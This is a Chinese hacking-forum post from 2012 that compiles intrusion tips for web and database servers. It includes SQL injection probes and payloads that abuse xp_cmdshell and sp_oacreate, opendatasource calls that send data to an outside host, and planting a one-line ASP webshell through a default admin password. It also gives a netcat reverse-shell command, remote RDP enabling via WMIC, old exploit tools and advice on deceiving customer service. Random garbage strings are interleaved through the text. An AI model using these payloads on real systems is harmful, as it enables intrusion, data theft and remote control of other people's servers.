找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3738|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
. C6 u7 B4 J* t; f; B/ Y6 V' s5 k8 q& j: G

- n$ U) `2 a) p& q5 {1 USA点数据库分离搞法+语句:
7 p2 f$ d) r6 G8 i. z% J
& |  w, G+ ]! P7 t! g3 y% i6 X注射点不显错,执行下面三条语句页面都返回正常。
6 Z$ R4 d( Y  z1 p5 J6 [5 N/ G  y' h& Nand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')$ l8 r2 M( w1 {
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
+ n9 y6 Y* X) A8 N9 l! j+ e' [and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
( E2 |# `+ ~# d6 f; r3 s可以列目录,判断系统为2000,web与数据库分离
1 x- L) n' J% j* Y遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。9 M: N+ m/ r: g5 E/ u
在注射点上执行+ L% b/ F1 A; v2 z/ K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--& c- R) e6 x- }* _- N  ~) k- k2 X
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
4 w5 ]; a" S4 }& s还有我用NC监听得其他端口都没有得到IP。
  x$ H) f. ~3 c" N1 Q4 y! _2 L7 V9 R6 K5 b
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。) E3 D2 R( U1 e. ^' C
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--4 g, k9 F( U: F# S
. i5 a8 U4 w( D. u( h
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
  q4 e! Z) i- P0 o) v8 Y* p- ^
) ?; M* X2 W* W9 }  ?! r$ N$ b现在就猜想是不是数据库是内网而且不能连外网。
6 m4 ~3 n/ [# O) K4 w+ {% B1 v+ k( |( q

# h9 o" G! T& D# A" R# i& H1 Vaccess导出txt文本代码5 x8 N! N& Q  e5 H+ o9 G
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
0 Y" `0 s. A/ j0 x8 p
' W1 N/ R6 l% a0 c, [- G2 q( g- G! W- D, `8 Y& j
( O& V. S1 y! ^+ h( q
自动跳转到指定网站代码头
* h" C8 f$ Z* y<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
: z- @$ d1 |$ `# r( P3 A3 ]% H0 J, z4 A2 v/ _; i
7 U* Z; g# ]  e, \( v% w
入侵java or jsp站点时默认配置文件路径:
" _, f4 P% h1 K3 ]. X0 Y$ L\web-inf\web.xml, N& f6 N( }7 v; X
tomcat下的配置文件位置:
- B" x8 P# C/ v4 r\conf\server.xml            (前面加上tomcat路径)( u& W6 g6 _: M  n! r
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml. k# c' q' m& L8 @+ S

$ o7 ]& h$ ?; r* d! L4 `( r6 C/ R: N! e, a" a8 y$ Q! m( a/ y
# O; r' x5 E2 H
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
. f1 [1 j& |- [  G" I# F6 u7 ]9 S-1%23
# x+ D- q% p" G# D5 u& z- G>
. _. s& W+ n0 u3 H' n% v<+ n7 v4 ]6 d5 q% i" O! a
1'+or+'1'='1
- |" Z6 e2 V3 ]3 G% @6 A. p: Oid=8%bf6 u- J3 q: [1 Z4 z5 j/ q0 X' M

1 h5 V2 n+ F. O; `全新注入点检测试法:
+ Z* c3 q+ M( n' l+ b- e在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。: b2 r7 i' q- [  L# B
, x) n6 M! J+ I2 Y6 a' w7 Y
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。. ?  q  r9 I: q5 E2 }# Q$ Y( ?
8 t0 D; ~# n5 }' N
搜索型注入判断方法:0 d2 G. W5 L: A# ~0 \
北京%' and '1'='1' and '%'='6 u! |8 x( C/ T: N9 t# b. Y
北京%' and '1'='2' and '%'='. e. e* G' ~- R, T; }9 D. m8 Y

. x1 C) l! {( M1 ]
. R" G9 i4 u3 p% t& C) K' v% BCOOKIES注入:4 o9 o! v) j6 M( P/ w
! ]) [  }, D+ V& t# h/ m4 m
javascript:alert(document.cookie="id="+escape("51 and 1=1"));6 o; j$ K7 f2 c! m$ S/ c$ K2 r( e

$ @: J; ]& {) k, Q- m2000专业版查看本地登录用户命令:2 R: ]/ e7 C- q( O8 ?6 ]2 f7 k# I7 O
net config workstation6 z% R; m' o% x

# }9 X3 y% v/ ?  S
% s" W, a+ q- L3 e3 f" D2003下查看ipsec配置和默认防火墙配置命令:  A/ N! P, P+ y
netsh firewall show config
2 ~: \8 Q# k4 L& Qnetsh ipsec static show all
* R5 E( g* w  K8 g4 y5 Z( K. t
+ I3 \" R0 q/ B8 M) ~) W不指派指定策略命令:+ w9 I  O* ?" W/ ?+ ~/ _
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
1 i4 v% B8 n( X7 w$ dnetsh ipsec static show policy all  显示策略名4 ]" C! ^+ E3 Z9 i6 P

% l! r8 K! a" C3 B6 R
+ v9 K. g: e7 k4 i2 \' {. }猜管理员后台小技巧:) j! S) e# x% X6 W# d4 [8 F5 T: w
admin/left.asp
: t# |! M; t' I( `5 n; Nadmin/main.asp3 t% k  s1 F$ |( E
admin/top.asp, O1 m1 D2 L) ]7 K
admin/admin.asp
( t8 N. U# t+ }9 }- X会现出菜单导航,然后迅雷下载全部链接
/ J, G7 S+ g$ f5 B3 I: p
8 h# T. G2 ]( N; f. E6 o+ q$ P9 ^5 v* ?4 v1 Y: O
社会工程学:  H$ P1 w0 j; ?
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
& x; A  i: N: W! _* \然后去骗客服6 ?0 q# C4 p( j

1 a; k* V5 v9 o8 m4 B* u1 G
% ?5 s: g8 I! s统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
7 r! p( T5 W# A0 p! k# G: M8 b查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
, Q- l$ M! Y0 z: P1 t* P( L  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
: g* E  c# c7 Z5 I
( |$ q. }/ N+ K5 o+ B3 _1 s
/ r( C% d6 {; r
/ x( Z) v* z) v# U* G* ?6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
4 P% A" H; y- o! H& O, C% [! {, Q$ g/ Q, R( y% J6 G2 U4 g
% y: n$ F# m; d2 B+ T, K$ @
  H1 L: ^0 @% x9 F' O
CMD加密注册表位置  l! R/ {2 L1 s( p- v
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor* t5 D: a0 B6 s, P% M4 j/ Y
AutoRun
% r" N( B, d$ f4 A: y
3 s0 B/ V" M7 _) X+ A4 d(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
7 t9 X6 F& Z/ H. i& H: d6 @AutoRun
: \2 V$ a$ N# ]' Y9 @" w, W9 P( }. u4 u2 [& C+ @, e4 y, J& ?# p7 d

0 L8 m) |2 g4 r+ Q1 R& O在找注入时搜索Hidden,把他改成test
; m" V  v$ ^4 q1 H" o% n6 D4 R4 k' e6 L3 t' H8 p
, }5 D4 _" x2 j8 s
8 {& O7 R0 v" R2 U( P9 b( J8 H2 i
mstsc /v:IP /console ! {' Z. n& x2 w/ e! C: d/ J& ]
+ a, @2 c' f3 _1 n

9 e( M4 }( L: Y( D* }: y一句话开3389:; K! T% P) u! D
* e9 p) L% ?: f, k2 S7 M/ ~
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  2 k1 y9 }  {' ^. d; d! w
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.4 {9 g3 e7 }7 K6 u- Z# D

% H2 \, Z& b/ u4 h4 {( W! f4 ~. o3 Z7 P' Y, q$ \9 H+ \
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
, C) Q+ R2 M" yInsert into admin(user,pwd) values('test','test')
' c9 o. p! N: r9 X2 {+ l) \3 ^$ l' q+ N$ g' n$ S" X5 _6 O2 V

. H/ G6 t' p0 q/ D) U; ?NC反弹: R' f/ {( }. P6 \& I, ~% ]
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
0 F5 `/ G; R' M% a然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行): T7 F$ M) f, ]8 V) a

. B2 D! H2 ^3 S5 K2 U% b" |
7 b+ g+ h1 t7 T, Z+ H在脚本入侵过程中要经常常试用%00来确认下参数是否有问题8 E) ^+ ?8 W3 `5 K7 _* J; `

4 N* S. a9 g: i+ ]7 z有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录  T0 B) S: e" ^8 H2 d
例如:
- J% I* W8 E, g2 w; f: [3 z6 b" u7 zsubst k: d:\www\ 用d盘www目录替代k盘
% W& ]" l# H2 psubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表